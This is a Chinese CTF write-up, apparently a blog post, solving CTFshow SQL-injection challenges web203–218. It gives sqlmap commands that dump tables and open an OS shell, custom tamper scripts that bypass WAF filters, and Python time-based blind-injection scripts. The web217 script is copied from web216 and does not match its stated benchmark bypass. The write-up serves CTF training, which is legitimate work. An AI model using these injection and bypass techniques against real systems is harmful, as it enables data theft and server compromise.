   //代码过于简单,不宜展示
  }

解题思路

使用–method 调整sqlmap的请求方式

EXP

sqlmap -u http://b96c710e-fe78-4aaf-a19c-c45338e228cf.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --dbms=mysql -D ctfshow_web -T ctfshow_user -C pass --dump

web204

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

cookie

EXP

sqlmap -u http://79f7214f-8734-406b-b4ef-e641adf16c46.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --dbms=mysql -D ctfshow_web -T ctfshow_user -C pass --dump --cookie="PHPSESSID=bdu0d5n7fqvh0n792j4inaomld;ctfshow=d739287c1b860e51896e2a2fa728baf0"

web205

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

api调用需要鉴权,不知道是啥,不懂得去百度

EXP

sqlmap -u http://3b31b28c-6b13-4cd5-b9eb-59a27ba95fa0.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql dbs=ctfshow_web -T ctfshow_flax -C flagx --dump  --headers="Content-Type: text/plain" --safe-url=http://3b31b28c-6b13-4cd5-b9eb-59a27ba95fa0.challenge.ctf.show/api/getToken.php --safe-freq=1

web206

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

sqlmap会自己判断闭合,和上面一样做就行

EXP

sqlmap -u http://3f019c71-0464-4492-803f-fe8d758be0d4.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql dbs=ctfshow_web -T ctfshow_flaxc -C flagv --dump  --headers="Content-Type: text/plain" --safe-url=http://3f019c71-0464-4492-803f-fe8d758be0d4.challenge.ctf.show/api/getToken.php --safe-freq=1

web207

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对传入的参数进行了过滤
  function waf($str){
   return preg_match('/ /', $str);
  }

解题思路

开始教你使用tamper,同时题目过滤了空格,tamper是sql自带的绕过waf的功能,其中有一个是space2comment.py 用/**/代替空格

EXP

sqlmap -u http://39ffb7ca-22b0-4fa8-9ba5-d5fd7ddf513a.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql dbs=ctfshow_web -T ctfshow_flaxca -C flagvc --dump  --headers="Content-Type: text/plain" --safe-url=http://39ffb7ca-22b0-4fa8-9ba5-d5fd7ddf513a.challenge.ctf.show//api/getToken.php --safe-freq=1 --tamper space2comment

web208

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对传入的参数进行了过滤
// $id = str_replace('select', '', $id);
  function waf($str){
   return preg_match('/ /', $str);
  }

解题思路

这题又新加了一个把select消掉的waf,所以还要再加一个tamper,randomcomments.py 用/**/分割sql关键字

EXP

sqlmap -u http://3be8680c-a746-45f7-9524-a687d085850c.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql dbs=ctfshow_web -T ctfshow_flaxcac -C flagvca --dump  --headers="Content-Type: text/plain" --safe-url=http://3be8680c-a746-45f7-9524-a687d085850c.challenge.ctf.show/api/getToken.php --safe-freq=1 --tamper="randomcase.py,space2comment.py"

web209

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对传入的参数进行了过滤
  function waf($str){
   //TODO 未完工
   return preg_match('/ |\*|\=/', $str);
  }

解题思路

过滤了等于号和星号,这题开始要自己搓tamper了,过滤了等于号可以用like代替,直接在space2comment.py里按照原本的格式改就行了,同时过滤了型号,要把原本的tamper的空格替换改成其他的

EXP

sqlmap -u http://dd71ce86-d055-4875-a491-287d1fdf75dc.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql -D ctfshow_web -T ctfshow_flav -C ctfshow_flagx --dump --headers="Content-Type: text/plain" --safe-url=http://dd71ce86-d055-4875-a491-287d1fdf75dc.challenge.ctf.show/api/getToken.php --safe-freq=1 --tamper space2comment

Tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x0a)
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '*':
                retVal += chr(0x31)
                continue
            elif payload[i] == '=':
                retVal += chr(0x0a)+"like"+chr(0x0a)
                continue
                
            elif payload[i] == '"':
                doublequote = not doublequote
                
            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x0a)
                continue

            retVal += payload[i]
    return retVal

web210

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }

解题思路

先看一眼代码,先对传入的数据b64解码,然后反转字符,再解码,再反转,那么我们要改的tamper就是要把payload先反转,再编码,然后反转再编码

EXP

sqlmap -u http://5432fae2-84ab-4474-b554-d08a5a73734d.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql -D ctfshow_web -T ctfshow_flavi -C ctfshow_flagxx --dump --headers="Content-Type: text/plain" --safe-url=http://5432fae2-84ab-4474-b554-d08a5a73734d.challenge.ctf.show/api/getToken.php --safe-freq=1 --tamper space2comment.py

Tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64
__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal = payload
    retVal = base64.b64encode(retVal[::-1])
    retVal = base64.b64encode(retVal[::-1])
    return retVal

web211

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }
function waf($str){
    return preg_match('/ /', $str);
}

解题思路

和上题一样,但是同时又对空格进行了过滤,所以要再上题的基础上替换空格

EXP

sqlmap -u http://8c4c63d8-44c8-46fa-af6a-e38917af77d2.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql  -D ctfshow_web -T ctfshow_flavia -C ctfshow_flagxxa --dump --headers="Content-Type: text/plain" --safe-url=http://8c4c63d8-44c8-46fa-af6a-e38917af77d2.challenge.ctf.show/api/getToken.php --safe-freq=1 --tamper space2comment.py

Tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64
__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/**/"
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += "/**/"
                continue

            retVal += payload[i]
    retVal = base64.b64encode(retVal[::-1])
    retVal = base64.b64encode(retVal[::-1])
    return retVal

web212

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }
function waf($str){
    return preg_match('/ |\*/', $str);
}

解题思路

把前面几题写的结合一下就行

EXP

sqlmap -u http://882da072-a9d3-4603-b2ee-db3be196e211.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show -D ctfshow_web -T ctfshow_flavis -C ctfshow_flagxsa --dump --headers="Content-Type: text/plain" --safe-url=http://882da072-a9d3-4603-b2ee-db3be196e211.challenge.ctf.show/api/getToken.php --safe-freq=1 --tamper space2comment.py

Tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64
__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x0a)
                    continue

            elif payload[i] == '\'':
                quote = not quote
            elif payload[i] == '*':
                retVal+=chr(0x31)
                continue
            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x0a)
                continue

            retVal += payload[i]
    retVal = base64.b64encode(retVal[::-1])
    retVal = base64.b64encode(retVal[::-1])
    return retVal

web213

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }
function waf($str){
    return preg_match('/ |\*/', $str);
}

解题思路

过滤词和上题一样,但要求你用-os-shell来getshell

EXP

sqlmap -u http://a882438c-4164-4d6c-b485-af1a4946c0c1.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --os-shell --headers="Content-Type: text/plain" --safe-url=http://a882438c-4164-4d6c-b485-af1a4946c0c1.challenge.ctf.show/api/getToken.php  --safe-freq=1 --tamper space2comment.py

Tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64
__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x0a)
                    continue

            elif payload[i] == '\'':
                quote = not quote
            elif payload[i] == '*':
                retVal+=chr(0x31)
                continue
            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x0a)
                continue

            retVal += payload[i]
    retVal = base64.b64encode(retVal[::-1])
    retVal = base64.b64encode(retVal[::-1])
    return retVal

web214

题目源码

//无
//屏蔽危险分子

解题思路

这题连个鸡掰都没给,看一下答案说是要看主页流量的select.js在这里面发现ip和debug的post传参,试了一下发现ip=sleep(3)&&debug=0可以执行,所以可以利用这个进行时间盲注

EXP

import requests
url='http://3535ec17-a5bd-482a-b325-99a78eb68394.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(0,128):
        #payload=f"if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j},sleep(2),0)"
        #payload=f"if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'),{i},1))={j},sleep(2),0)#"
        payload=f"if(ascii(substr((select flaga from ctfshow_flagx),{i},1))={j},sleep(2),0)#"
        data={"ip":payload,
        "debug":0}
        try:
            r=requests.post(url,data,timeout=2)
        except:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

web215

题目源码

//用了单引号
//屏蔽危险分子

解题思路

用了单引号,那就要先闭合再搞

EXP

import requests
url='http://5fd5b376-28a1-4832-9fc2-bec290ec6625.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(0,128):
        #payload=f"1' or if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j},sleep(2),0)#"
        #payload=f"1' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{i},1))={j},sleep(2),0)#"
        payload=f"1' or if(ascii(substr((select flagaa from ctfshow_flagxc),{i},1))={j},sleep(2),0)#"
        data={"ip":payload,
        "debug":0}
        try:
            r=requests.post(url,data,timeout=2)
        except:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

web216

题目源码

where id = from_base64($id);
//屏蔽危险分子

解题思路

用括号闭合base64,然后继续

EXP

import requests
url='http://6ef16676-3e80-43da-bbe6-13754ed71f0e.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(32,128):
        #payload=f"'NjY2') or if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j},sleep(2),0)#"
        #payload=f"'NjY2') or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxcc'),{i},1))={j},sleep(2),0)#"
        payload=f"'NjY2') or if(ascii(substr((select flagaac from ctfshow_flagxcc),{i},1))={j},sleep(2),0)#"
        data={"ip":payload,
        "debug":0}
        try:
            r=requests.post(url,data,timeout=2)
        except:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

web217

题目源码

where id = ($id)
    //屏蔽危险分子
    function waf($str){
        return preg_match('/sleep/i',$str);
    }

解题思路

过滤了sleep,可以用benchmark绕过,不能无脑拉大数字,而且加个time.sleep延迟,不然网址卡爆没法出结果

EXP

import requests
url='http://6ef16676-3e80-43da-bbe6-13754ed71f0e.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(32,128):
        #payload=f"'NjY2') or if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j},sleep(2),0)#"
        #payload=f"'NjY2') or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxcc'),{i},1))={j},sleep(2),0)#"
        payload=f"'NjY2') or if(ascii(substr((select flagaac from ctfshow_flagxcc),{i},1))={j},sleep(2),0)#"
        data={"ip":payload,
        "debug":0}
        try:
            r=requests.post(url,data,timeout=2)
        except:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

web218

题目源码

where id = ($id)
    //屏蔽危险分子
    function waf($str){
        return preg_match('/sleep|benchmark/i',$str);
    }

解题思路

过滤了benchmark,可以用其他方法拖时间

EXP

import requests
import time
url='http://d10b5a86-5d3e-4c29-a5ea-cfa81bcb7f09.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(32,128):
        #payload=f"1) or if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j},(select count(*) from information_schema.columns A,information_schema.columns B),0)#"
        #payload=f"1) or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{i},1))={j},(select count(*) from information_schema.columns A,information_schema.columns B),0)#"
        payload=f"1) or if(ascii(substr((select flagaaC from ctfshow_flagxc),{i},1))={j},(select count(*) from information_schema.columns A,information_schema.columns B),0)#"
        data={"ip":payload,
        "debug":0}
        try:
            r=requests.post(url,data,timeout=0.6)
        except:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

待续

久而不念
关注
CTFSHOW web193 left标注盲注脚本
05-04
它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,包括数据库名、表名、列名和 flag 的值。在获取每...
最全CTF Web题思路总结(更新ing)
热门推荐
yjprolus的博客
02-12 5万+
个人向CTF Web题思路总结笔记
ctfshow web入门-sql注入
LYJ20010728的博客
09-21 2950
ctfshow web入门-sql注入web171web172web173web174web175web176web177web178web179web180web181web182web183web184web185web186web187web188web189web190web191web192web193web194web195web195web197web198web199web200web201web202web203 web171 根据题目给出的查询语句构造 Payload $sql
ctfshow-web入门-sql注入web191-web195)
最新发布
Welcome To Myon'Blog !
08-07 1007
我们不指定第三个参数,就可以实现和 left 和 right 一样的效果。密码只能是数字,过滤了空格,采用反引号包裹绕过,题目已经说了是堆叠注入,这里直接修改用户名和密码:
CTFshow-WEB入门-SQL注入(下)
feng的博客
02-11 2087
web227 按照上一题的方法,发现查不出flag表了,把ctfshow_user表给爆了一下也没flag,然后写一句话马,蚁剑连上去还是找不到flag,人傻了。。。 看了一下y4师傅的WP,原来这题考的是存储过程: 存储过程(Stored Procedure)是一种在数据库中存储复杂程序,以便外部程序调用的一种数据库对象。 存储过程是为了成特定功能的SQL语句集,经编译创建并保存在数据库中,用户可通过指定存储过程的名字并给定参数(需要时)来调用执行。 存储过程思想上很简单,就是数据库 SQL 语言层面
ctfshow-sql注入-超详解(172-200)
qq_50589021的博客
08-05 2709
前言 今天是2021/7/25,正式进入sql注入专题,目标:加强python的学习,达到通过写python脚本,加快注入速度的程度,掌握sql在php编程中的一系列查询语句。 新手区 可以看看Y4师傅以前记录的小笔记 SQL注入之MySQL注入的学习笔记(一) SQL注入之MySQL注入学习笔记(二) 2021-7-25 web172、web173——hex() 、to_base64() 查询语句 //拼接sql语句查找指定ID用户 $sql = "select username,password fro
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4713
ctfshow 靶场 web入门 sql注入系列
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
Web安全SQL注入精讲视频.zip
04-16
1-1 SQL注入的业务场景以及危害.mp4 1-2 真实网站中的SQL注入是怎么样的.mp4 1-3 SQL为什么有那么多分类.mp4 2-1 整型注入.mp4 2-10 SQL注入读写文件.mp4 2-2 字符型注入(单引号、双引号、括号).mp4 2-3 POST注入....
Web安全SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
sql注入讲解ppt.pptx
08-10
SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库...
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4451
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
适合小白ctfshow-web入门sql注入175-248超详细解析!!
2201_75930505的博客
09-12 676
将数据输出到一个文件中,然后访问对应文件: 这是一个UNION查询,它将原始查询的结果与从表中选择的用户名和密码进行合并。: 这部分似乎是将查询结果导出到文件。路径表示要将查询结果写入到位于网页根目录下的名为1.txt的文件中。(路径是一个常见的用于存放网页文件的目录,通常被称为网页根目录。在许多Web服务器中,这个目录被设置为存放网站的主要文件,因此可以通过浏览器访问。
CTFshow-WEB入门-SQL注入(中)
feng的博客
02-08 1862
web199 很懵。。。把括号给过滤了,所以varchar(255)就不能用了,考虑改成其他的类型,但是不知道到底哪里出了问题,每次一改不是没效果,就是查不出来东西。一旦alter出错就要重新启容器,很烦。 看了一下y4师傅的姿势,服了 1;show tables; ctfshow_user 对,最简单的方法,一直都没想起来,我太菜了。。。 web200 同上 web201 开始学习sqlmap的使用。 sqlmap的使用手册:sqlmap 不过因为是纯英文,英文太菜的我肯定看不太懂,不过也不需要多深入的
ctfshow大部分wp(附带个人整理知识笔记)
ZxC789456302的博客
10-01 7379
WEB信息搜集入门(前10道都是水题,10题后没有水题了)源码中即为flag(签到题)前端js拦截,查看源代码即可,得到flagflag在响应头里面在访问robots.txt,得知存在flagishere.txt文件,访问获得flagphps源码泄露,访问index.phps,下载文件打开得到flag访问www.zip获取配置文件得知在服务器下存在fl000g.txt,线上访问得到flag访问.git(隐藏文件)注意格式为/.git/,得到flag隐藏文件的第二种情况,访问.svn,格式为/.svn/,得到
CTFShow-Web篇详细wp(持续更新中ing)
Aluxian_的博客
04-23 1270
【代码】CTFShow-Web篇详细wp
CTFSHOW -SQL 注入
m0_64180167的博客
11-13 770
重新来做一遍 争取不看wp
ctfshow学习记录-web入门sql注入191-200)
龟速更新的九某人
01-11 1260
ctfshow学习记录-web入门sql注入web191-web200)
ctfshow web入门 sql注入
03-17
SQL注入是一种常见的网络安全漏洞,它通过提交非法的SQL语句来欺骗Web应用程序,访问或修改数据库中的数据。通过在Web应用程序的输入字段中插入恶意代码,攻击者可以绕过安全措施并获得不应该拥有的敏感信息。为了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值